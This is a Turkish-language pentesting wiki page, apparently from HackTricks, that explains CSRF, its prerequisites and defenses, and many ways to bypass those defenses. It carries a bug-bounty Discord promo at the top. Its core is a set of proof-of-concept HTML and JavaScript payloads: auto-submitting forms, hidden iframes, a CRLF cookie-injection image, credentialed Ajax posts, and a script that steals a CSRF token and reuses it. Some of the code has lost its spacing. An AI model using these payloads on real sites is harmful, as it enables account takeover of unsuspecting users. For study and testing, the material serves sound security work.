Deneyimli hackerlar ve ödül avcıları ile iletişim kurmak için HackenProof Discord sunucusuna katılın!
Hacking İçgörüleri
Hacking'in heyecanına ve zorluklarına inen içeriklerle etkileşime girin
Gerçek Zamanlı Hack Haberleri
Hızla değişen hacking dünyasında gerçek zamanlı haberler ve içgörülerle güncel kalın
En Son Duyurular
Yayınlanan en yeni ödül avı başlangıçlarını ve önemli platform güncellemelerini takip edin
Bize katılınDiscord ve bugün en iyi hackerlarla işbirliğine başlayın!
Cross-Site Request Forgery (CSRF) Açıklaması
Cross-Site Request Forgery (CSRF), web uygulamalarında bulunan bir güvenlik açığı türüdür. Bu açık, saldırganların kimlik doğrulanmış oturumlarını sömürerek habersiz kullanıcılar adına eylemler gerçekleştirmesine olanak tanır. Saldırı, bir kullanıcının, bir kurbanın platformuna oturum açmış olduğu sırada kötü niyetli bir siteyi ziyaret etmesiyle gerçekleştirilir. Bu site daha sonra JavaScript çalıştırarak, formlar göndererek veya resimler getirerek kurbanın hesabına istekler gönderir.
CSRF Saldırısı için Önkoşullar
CSRF açığından yararlanmak için birkaç koşulun sağlanması gerekir:
Değerli Bir Eylemi Tanımlama: Saldırganın, kullanıcının şifresini, e-postasını değiştirmek veya ayrıcalıkları yükseltmek gibi sömürülmeye değer bir eylem bulması gerekir.
Oturum Yönetimi: Kullanıcının oturumu yalnızca çerezler veya HTTP Temel Kimlik Doğrulama başlığı aracılığıyla yönetilmelidir, diğer başlıklar bu amaçla manipüle edilemez.
Tahmin Edilemeyen Parametrelerin Eksikliği: İstek, tahmin edilemeyen parametreler içermemelidir, çünkü bunlar saldırıyı engelleyebilir.
Hızlı Kontrol
Burp'ta isteği yakalayabilir ve CSRF korumalarını kontrol edebilir ve tarayıcıdan test etmek için Kopyala ve fetch olarak yap'a tıklayabilirsiniz ve isteği kontrol edebilirsiniz:
CSRF'ye Karşı Savunma
CSRF saldırılarına karşı korunmak için birkaç karşı önlem alınabilir:
Kullanıcı Doğrulaması: Kullanıcının niyetini doğrulamak için şifresini sormak veya bir captcha çözdürmek önemli olabilir.
Referrer veya Origin Başlıklarını Kontrol Etme: Bu başlıkları doğrulamak, isteklerin güvenilir kaynaklardan geldiğinden emin olmaya yardımcı olabilir. Ancak, URL'lerin dikkatli bir şekilde oluşturulması, kötü uygulanmış kontrolleri atlatmaya olanak tanır, örneğin:
http://mal.net?orig=http://example.com (URL güvenilir URL ile biter)
http://example.com.mal.net (URL güvenilir URL ile başlar)
Parametre Adlarını Değiştirme: POST veya GET isteklerinde parametre adlarını değiştirmek, otomatik saldırıları önlemede yardımcı olabilir.
CSRF Token'ları: Her oturuma benzersiz bir CSRF token eklemek ve bu token'ı sonraki isteklerde gerektirmek, CSRF riskini önemli ölçüde azaltabilir. Token'ın etkinliği, CORS'un zorunlu kılınmasıyla artırılabilir.
Bu savunmaları anlamak ve uygulamak, web uygulamalarının güvenliğini ve bütünlüğünü korumak için hayati önem taşır.
Savunmaları Atlatma
POST'tan GET'e
Belki de istismar etmek istediğiniz form, bir CSRF token ile POST isteği göndermeye hazırlanmıştır ancak, bir GET'in de geçerli olup olmadığını kontrol etmelisiniz ve GET isteği gönderdiğinizde CSRF token'ın hala doğrulandığını kontrol edin.
Token eksikliği
Uygulamalar, var olduklarında token'ları doğrulamak için bir mekanizma uygulayabilir. Ancak, token yokken doğrulamanın tamamen atlandığı bir güvenlik açığı ortaya çıkabilir. Saldırganlar, token'ı taşıyan parametreyi sadece değerini değil, parametreyi kaldırarak doğrulama sürecini atlayabilir. Bu, saldırganların doğrulama sürecini atlayarak Cross-Site Request Forgery (CSRF) saldırısını etkili bir şekilde gerçekleştirmesine olanak tanır.
CSRF token'ı kullanıcı oturumuna bağlı değil
Uygulamalar, CSRF token'larını kullanıcı oturumlarına bağlamayarak önemli bir güvenlik riski oluşturabilir. Bu sistemler, her token'ın başlatan oturuma bağlı olmasını sağlamak yerine token'ları genel bir havuzda doğrular.
Saldırganların bunu nasıl sömürdüğü:
Kendi hesaplarıyla kimlik doğrulama yaparlar.
Genel havuzdan geçerli bir CSRF token alırlar.
Bu token'ı bir kurban üzerindeki CSRF saldırısında kullanırlar.
Bu zayıf nokta, saldırganların, uygulamanın yetersiz token doğrulama mekanizmasını sömürerek kurban adına yetkisiz istekler yapmasına olanak tanır.
Yöntem atlatma
Eğer istek "garip" bir yöntem kullanıyorsa, yöntem geçersizleştirme işlevinin çalışıp çalışmadığını kontrol edin. Örneğin, PUT yöntemi kullanılıyorsa POST yöntemini deneyebilir ve şunu gönderebilirsiniz: https://example.com/my/dear/api/val/num?_method=PUT
Bu ayrıca _method parametresini bir POST isteği içine yerleştirerek veya başlıkları kullanarak çalışabilir:
X-HTTP-Method
X-HTTP-Method-Override
X-Method-Override
Özel başlık token atlatma
Eğer istek, CSRF koruma yöntemi olarak bir token ile özel bir başlık ekliyorsa, o zaman:
Özel Token ve başlığı olmadan isteği test edin.
Aynı uzunlukta fakat farklı bir token ile isteği test edin.
CSRF token'ı bir çerez tarafından doğrulanıyor
Uygulamalar, CSRF korumasını, hem bir çerezde hem de bir istek parametresinde token'ı çoğaltarak veya bir CSRF çerezi ayarlayarak ve backend'de gönderilen token'ın çerezle eşleşip eşleşmediğini doğrulayarak uygulayabilir. Uygulama, isteğin token'ının, çerezdeki değerle uyumlu olup olmadığını kontrol ederek istekleri doğrular.
Ancak, bu yöntem, web sitesinin, bir saldırganın kurbanın tarayıcısına bir CSRF çerezi yerleştirmesine izin veren hatalara sahip olması durumunda CSRF saldırılarına karşı savunmasızdır. Saldırgan, çerezi ayarlayan aldatıcı bir resim yükleyerek ve ardından CSRF saldırısını başlatarak bunu sömürebilir.
Aşağıda, bir saldırının nasıl yapılandırılabileceğine dair bir örnek bulunmaktadır:
<html><!-- CSRF Proof of Concept - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formaction="https://example.com/my-account/change-email"method="POST"><inputtype="hidden"name="email"value="asd@asd.asd" /><inputtype="hidden"name="csrf"value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" /><inputtype="submit"value="Submit request" /></form><img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body></html>
csrf belirteci oturum çerezi ile ilişkilendirilmişse bu saldırı çalışmayacaktır çünkü kurbanın oturumunu ayarlamanız gerekecek ve dolayısıyla kendinize saldıracaksınız.
Content-Type değişikliği
Buna göre, POST yöntemini kullanarak önyükleme isteklerini önlemek için izin verilen Content-Type değerleri şunlardır:
application/x-www-form-urlencoded
multipart/form-data
text/plain
Ancak, Sunucunun mantığı kullanılan Content-Type'a bağlı olarak değişebilir, bu nedenle belirtilen değerleri ve application/json,text/xml, application/xml. gibi diğer değerleri denemelisiniz.
JSON verilerini text/plain olarak gönderme örneği (buradan):
JSON Verileri için Preflight İsteklerinin Atlatılması
JSON verilerini bir POST isteği aracılığıyla göndermeye çalışırken, bir HTML formunda Content-Type: application/json kullanmak doğrudan mümkün değildir. Benzer şekilde, bu içerik türünü göndermek için XMLHttpRequest kullanmak bir preflight isteği başlatır. Bununla birlikte, sunucunun JSON verilerini işleyip işlemediğini Content-Type'a bakılmaksızın kontrol etmek için bu kısıtlamayı potansiyel olarak atlatmanın stratejileri bulunmaktadır:
Alternatif İçerik Türleri Kullanma: Formda enctype="text/plain" ayarlayarak Content-Type: text/plain veya Content-Type: application/x-www-form-urlencoded kullanın. Bu yaklaşım, sunucunun Content-Type'a bakılmaksızın verileri kullanıp kullanmadığını test eder.
İçerik Türünü Değiştirme: Sunucunun içeriği JSON olarak tanıdığından emin olurken preflight isteğini önlemek için verileri Content-Type: text/plain; application/json ile gönderebilirsiniz. Bu bir preflight isteği başlatmaz ancak sunucunun application/json'ı kabul etmek için yapılandırılmışsa doğru şekilde işleyebilir.
SWF Flash Dosyası Kullanımı: Daha az yaygın ancak mümkün olan bir yöntem, bu tür kısıtlamaları atlamak için bir SWF flash dosyası kullanmaktır. Bu teknik hakkında detaylı bilgi için bu yazıya başvurun.
Referrer / Origin kontrolünü atlatma
Referrer Başlığını Kullanmamak
Uygulamalar, 'Referer' başlığını yalnızca var olduğunda doğrulayabilir. Tarayıcının bu başlığı göndermesini engellemek için aşağıdaki HTML meta etiketi kullanılabilir:
<metaname="referrer"content="never">
Bu, bazı uygulamalardaki doğrulama kontrollerini atlayarak 'Referer' başlığının atlandığından emin olur.
Sunucunun alan adını Referrer'ın parametreler içinde göndereceği URL'de ayarlamak için şunu yapabilirsiniz:
<html><!-- Referrer policy needed to send the qury parameter in the referrer --><head><metaname="referrer"content="unsafe-url"></head><body><script>history.pushState('','','/')</script><formaction="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email"method="POST"><inputtype="hidden"name="email"value="asd@asd.asd" /><inputtype="submit"value="Submit request" /></form><script>// You need to set this or the domain won't appear in the query of the referer headerhistory.pushState("","","?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")document.forms[0].submit();</script></body></html>
HEAD yöntemi bypass
Bu CTF çözümünin ilk kısmında Oak'ın kaynak kodu, bir yönlendiricinin HEAD isteklerini yanıtsız GET istekleri olarak işlemek üzere ayarlandığı açıklanmıştır - bu, Oak'a özgü olmayan yaygın bir çalışma biçimidir. HEAD isteklerini işleyen özel bir işleyici yerine, bunlar sadece GET işleyicisine verilir ancak uygulama yanıt gövdesini kaldırır.
Bu nedenle, bir GET isteğinin sınırlı olduğu durumlarda, GET isteği göndermek yerine işlenecek bir HEAD isteği gönderebilirsiniz.
Sömürü Örnekleri
CSRF Belirteci Sızdırma
Eğer bir CSRF belirteci kullanılıyorsa savunma olarak, XSS zafiyeti veya Dangling Markup zafiyetini istismar ederek onu sızdırmayı deneyebilirsiniz.
HTML etiketleri kullanarak GET
<imgsrc="http://google.es?param=VALUE"style="display:none" /><h1>404 - Page not found</h1>The URL you are requesting is no longer available
Diğer HTML5 etiketleri, otomatik olarak bir GET isteği göndermek için kullanılabilir:
<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formmethod="GET"action="https://victim.net/email/change-email"><inputtype="hidden"name="email"value="some@email.com" /><inputtype="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
Form POST isteği
<html><body><script>history.pushState('','','/')</script><formmethod="POST"action="https://victim.net/email/change-email"id="csrfform"><input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<inputtype="submit"value="Submit request" /><imgsrc=xonerror="csrfform.submit();" /> <!-- Way 2 to autosubmit --></form><script>document.forms[0].submit(); //Way 3 to autosubmit</script></body></html>
Iframe aracılığıyla Form POST isteği
<!--The request is sent through the iframe withuot reloading the page--><html><body><iframestyle="display:none"name="csrfframe"></iframe><formmethod="POST"action="/change-email"id="csrfform"target="csrfframe"><inputtype="hidden"name="email"value="some@email.com"autofocusonfocus="csrfform.submit();" /><inputtype="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
Ajax POST isteği
<script>var xh;if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safarixh=newXMLHttpRequest();}else{// code for IE6, IE5xh=newActiveXObject("Microsoft.XMLHTTP");}xh.withCredentials =true;xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");</script><script>//JQuery version$.ajax({type:"POST",url:"https://google.com",data:"param=value¶m2=value2"})</script>
<--! expl.html --><bodyonload="envia()"><formmethod="POST"id="formulario"action="http://aplicacion.example.com/cambia_pwd.php"><inputtype="text"id="pwd"name="pwd"value="otra nueva"></form><body><script>functionenvia(){document.getElementById("formulario").submit();}</script><!-- public.html --><iframesrc="2-1.html"style="position:absolute;top:-5000"></iframe><h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
CSRF Token'unu Çalma ve bir POST isteği gönderme
functionsubmitFormWithTokenJS(token) {var xhr =newXMLHttpRequest();xhr.open("POST",POST_URL,true);xhr.withCredentials =true;// Send the proper header information along with the requestxhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");// This is for debugging and can be removedxhr.onreadystatechange=function() {if(xhr.readyState ===XMLHttpRequest.DONE&&xhr.status ===200) {//console.log(xhr.responseText);}}xhr.send("token="+ token +"&otherparama=heyyyy");}functiongetTokenJS() {var xhr =newXMLHttpRequest();// This tels it to return it as a HTML documentxhr.responseType ="document";xhr.withCredentials =true;// true on the end of here makes the call asynchronousxhr.open("GET",GET_URL,true);xhr.onload=function (e) {if (xhr.readyState ===XMLHttpRequest.DONE&&xhr.status ===200) {// Get the document from the responsepage =xhr.response// Get the input elementinput =page.getElementById("token");// Show the token//console.log("The token is: " + input.value);// Use the token to submit the formsubmitFormWithTokenJS(input.value);}};// Make the requestxhr.send(null);}varGET_URL="http://google.com?param=VALUE"varPOST_URL="http://google.com?param=VALUE"getTokenJS();
CSRF Token'un çalınması ve bir iframe, bir form ve Ajax kullanılarak bir Post isteği gönderilmesi
Kod, bir CSRF belirteci kullanarak bir giriş formuna Kaba Kuvvet saldırısı yapmak için kullanılabilir (Ayrıca olası bir IP karalama listesini atlatmaya çalışmak için X-Forwarded-For başlığını da kullanıyor):
